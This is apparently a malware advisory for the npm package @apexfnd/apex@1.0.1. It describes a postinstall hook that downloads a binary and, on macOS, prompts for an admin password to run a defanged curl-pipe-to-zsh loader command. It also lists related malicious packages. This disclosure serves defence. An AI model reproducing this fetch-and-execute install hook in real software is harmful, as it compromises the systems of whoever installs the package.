@apexfnd/apex@1.0.1
Malicious code in @apexfnd/apex (npm)
T1195.002 · Compromise Software Supply ChainT1059.007 · JavaScriptT1105 · Ingress Tool TransferT1071.001 · Web ProtocolsT1059.004 · Unix Shell
Analysis
The postinstall hook in install.cjs downloads a binary from github[.]com/Apex-Foundation/copilot, and on macOS writes a temporary AppleScript that executes 'curl -fsSL hxxps://update[.]apex-arena-router[.]com/loader[.]sh | zsh' with administrator privileges via osascript, prompting the user for their admin password. The domain update[.]apex-arena-router[.]com is a remote code delivery endpoint. The package also downloads a platform-specific binary from GitHub releases.
- analyzed by
- Leitwacht
- first seen
- Jul 21, 2026, 11:34 PM
- analyzed
- Jul 21, 2026, 11:36 PM
Related advisories
- n8n-nodes-quick-utils@1.0.0
- n8n-nodes-task-runner@1.0.0
- n8n-nodes-devops-utils@1.0.0
- time-format-kit@1.0.2
- string-formatter-pro@1.0.0
- code-formatter-setup@1.0.0
- node-sysmon-native@1.0.0
- node-procmetrics@1.0.6
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.